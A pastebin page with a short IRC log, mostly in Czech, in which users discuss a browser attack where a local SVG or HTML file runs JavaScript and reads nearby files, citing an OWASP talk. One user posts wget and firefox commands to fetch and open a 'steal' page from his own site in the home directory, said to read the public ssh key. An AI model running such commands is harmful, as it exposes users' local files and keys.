Minetest pastebin - Stikked

SVG javascript attack

From Anonymous, 8 Years ago, written in Plain Text, viewed 138 times.
URL http://minetest.wjake.com/stikked/view/8753eb39 Embed
Download Paste or View Raw
  1. [00:41:37] <Jenda`> https://www.owasp.org/images/0/03/Mario_Heiderich_OWASP_Sweden_The_image_that_called_me.pdf
  2. [00:44:50] <atalax> "Image is an SVG and executes JavaScript locally" "Attacker can read local files (same directory, sub-folders)"
  3. [00:44:54] <atalax> wtf?!
  4. [00:50:38] <Jenda`> ano, ve firefoxu to funguje
  5. [00:52:27] <Jenda`> alespoň v html
  6. [00:52:30] <Jenda`> cd ~
  7. [00:52:35] <Jenda`> wget -q http://jenda.hrach.eu/steal.html
  8. [00:52:39] <Jenda`> firefox  steal.html
  9. [00:52:51] <Jenda`> (nebojte, čte to *veřejný* ssh klíč)
  10. [00:53:43] <Mrkva> ale musim si to ulozit do ~/
  11. [00:54:57] <Jenda`> jj
  12. [00:58:52] <Jenda`> http://jenda.hrach.eu/steal.svg
  13. [00:59:01] <Jenda`> nobody expects…
  14. [00:59:28] <atalax> imho se docela zajímavý věci daj zjistit i z obsahu ~/Downloads/

Reply to "SVG javascript attack"

Here you can reply to the paste above

Powered by Stikked